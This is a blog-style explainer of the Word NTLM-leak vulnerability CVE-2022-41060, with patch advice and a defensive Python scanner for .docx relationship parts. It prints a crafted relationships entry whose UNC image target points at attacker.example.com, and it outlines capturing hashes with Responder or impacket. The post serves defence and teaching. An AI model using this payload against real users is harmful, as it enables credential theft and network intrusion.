CVE-2022-41060 - Understanding the Microsoft Word Information Disclosure Vulnerability

Microsoft Word is widely used for everyday tasks, from writing homework to sharing contracts in huge businesses. But with popularity comes attention from hackers. In late 2022, Microsoft published details of a security hole: CVE-2022-41060. This post will break down what this CVE is, why it matters, and how attackers could have taken advantage of it. Let’s make sure you know what happened, what to look for, and how to stay safe!

What is CVE-2022-41060?

CVE-2022-41060 is an information disclosure vulnerability in Microsoft Word. That means, under certain conditions, attackers can trick Word into revealing information that should stay private. This issue is related to—but importantly, not the same as—CVE-2022-41103. Microsoft listed the risk as "Important" in its security updates.

How Does the Vulnerability Work?

Attackers can craft a malicious Word file (.docx, .doc, .rtf, etc.) and convince a user to open and view it. By exploiting how Word handles certain document features—especially embedded objects or external links—an attacker can cause Word to leak sensitive information. This can include parts of the user's files, usernames, or even authentication tokens.

In outline, the attack runs as follows:

1. The attacker crafts a Word document containing an embedded object or external link that points at a server they control.
2. The attacker convinces the user to open the file.
3. When opened, Word automatically tries to fetch or display the embedded data.
4. Sensitive information (like the user's NTLM hash) is sent to a server controlled by the attacker.

Below is a simplified example of how attackers might structure such a Word document (word/document.xml):

<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"
            xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
            xmlns:v="urn:schemas-microsoft-com:vml"
            xmlns:o="urn:schemas-microsoft-com:office:office">
  <w:body>
    <w:p>
      <w:r>
        <w:object>
          <v:shape id="Picture" style="width:100pt;height:100pt">
            <!-- r:id refers to a relationship in word/_rels/document.xml.rels -->
            <v:imagedata r:id="rIdImage1" o:title=""/>
          </v:shape>
        </w:object>
      </w:r>
    </w:p>
  </w:body>
</w:document>

And in the document’s relationships part (word/_rels/document.xml.rels):

<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rIdImage1"
                Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
                Target="\\attacker.example.com\share\image.png"
                TargetMode="External"/>
</Relationships>

Explanation:
This tells Word to fetch an image from \\attacker.example.com\share\image.png. Because the target is a UNC path, Windows opens an SMB connection to attacker.example.com and, as part of NTLM authentication, sends a challenge-response derived from the user's password (the "NTLM hash" in everyday usage) to the attacker’s server. The attacker can try to crack this hash offline or use it in further network attacks.

Why is This Dangerous?

Information disclosure in products like Word can, in many cases, seem "minor" at first. But leaking NTLM hashes or sensitive paths can help an attacker move further inside a network, impersonate users, or launch future attacks. It's a soft entry point for bigger threats like ransomware or espionage.

In outline, reproducing the leak in a test environment looks like this:

1. Set up a basic network share or SMB server to catch NTLM hashes. Tools like impacket’s smbserver.py or Responder are useful.
2. Use the relationship code above, pointing to your server.
3. Send/open the file on a Windows system with Word installed. When Word tries to load the object, it will initiate an SMB connection to the attacker’s server, sending authentication data.

Mitigation and Patches

Microsoft released patches for CVE-2022-41060 as part of their November 2022 Patch Tuesday. Check that your Office installation is up to date!

- Update Word/Office automatically.
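As an added, defender-side example that is not part of the original post: the Python script below inspects the relationship parts of a .docx package and flags exactly the kind of external, automatically loaded target shown in the relationships snippet above, so a mail gateway or triage script can quarantine such attachments before Word ever opens them. The function names, the target patterns and the in-memory sample document are my own assumptions and constructions; the sample reuses the attacker.example.com image relationship from the post and adds a benign hyperlink that must not be flagged.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# OPC relationship namespace used by every *.rels part in a .docx package.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
HYPERLINK_TYPE_SUFFIX = "/hyperlink"

# Assumed patterns for targets that make Word reach out over the network:
# a UNC path (\\host\share\...) or an http(s)/file URL.
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")
URL_RE = re.compile(r"^(https?|file)://", re.IGNORECASE)


def classify_target(target: str) -> Optional[str]:
    """Return 'unc', 'url' or None for a relationship Target attribute."""
    t = target.strip()
    if UNC_RE.match(t):
        return "unc"
    if URL_RE.match(t):
        return "url"
    return None


def scan_rels_xml(rels_xml: bytes, part_name: str) -> List[Dict[str, str]]:
    """Scan one .rels part; return a finding per auto-loaded external target."""
    try:
        root = ET.fromstring(rels_xml)
    except ET.ParseError as exc:
        # A relationships part that does not parse is itself worth flagging.
        return [{"part": part_name, "id": "", "type": "", "target": "",
                 "kind": "unparseable", "detail": str(exc)}]
    findings: List[Dict[str, str]] = []
    for rel in root.iter(RELS_NS + "Relationship"):
        if rel.get("TargetMode", "Internal").lower() != "external":
            continue  # internal parts live inside the zip; nothing is fetched
        target = rel.get("Target", "")
        rel_type = rel.get("Type", "")
        kind = classify_target(target)
        if kind is None:
            continue
        if kind == "url" and rel_type.endswith(HYPERLINK_TYPE_SUFFIX):
            continue  # ordinary clickable link: only followed on user action
        findings.append({"part": part_name, "id": rel.get("Id", ""),
                         "type": rel_type.rsplit("/", 1)[-1],
                         "target": target, "kind": kind, "detail": ""})
    return findings


def scan_docx(docx_bytes: bytes) -> List[Dict[str, str]]:
    """Scan every *.rels part of an in-memory .docx/.dotx package."""
    findings: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".rels"):
                findings.extend(scan_rels_xml(zf.read(name), name))
    return findings


# Constructed fixture (not a real document): a minimal package whose
# document.xml.rels carries the UNC image relationship from the post,
# plus one benign hyperlink and one internal part that must not be flagged.
SAMPLE_RELS = r"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rIdImage1"
                Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
                Target="\\attacker.example.com\share\image.png"
                TargetMode="External"/>
  <Relationship Id="rIdLink1"
                Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
                Target="https://www.example.com/"
                TargetMode="External"/>
  <Relationship Id="rIdStyles"
                Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
                Target="styles.xml"/>
</Relationships>
"""


def build_sample_docx() -> bytes:
    """Build the constructed fixture package in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    # Usage: python scan_docx.py suspicious.docx   (falls back to the fixture)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_docx()
    for f in scan_docx(data):
        print(f"{f['part']}: {f['id']} ({f['type']}) -> {f['target']} [{f['kind']}]")
```

The scanner deliberately skips external hyperlink relationships, which are followed only when the user clicks, and flags everything else Word resolves on its own (images, OLE objects, attached templates); a relationships part that fails to parse is reported too, since a malformed package is not something a gateway should wave through.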

References & Further Reading

- Microsoft Security Update Guide - CVE-2022-41060
- Microsoft Security Blog
- NTLM Hash Attacks with Word Documents
- How Office Documents Leak Credentials

Final Thoughts

CVE-2022-41060 is a great lesson in just how much power a simple document format can have. Always update your software and be cautious when opening unexpected files. If you're managing corporate systems, educate users and filter potentially dangerous attachments at the gateway.

Stay safe and always update!


Timeline

Published on: 11/09/2022 22:15:00 UTC
Last modified on: 11/10/2022 00:33:00 UTC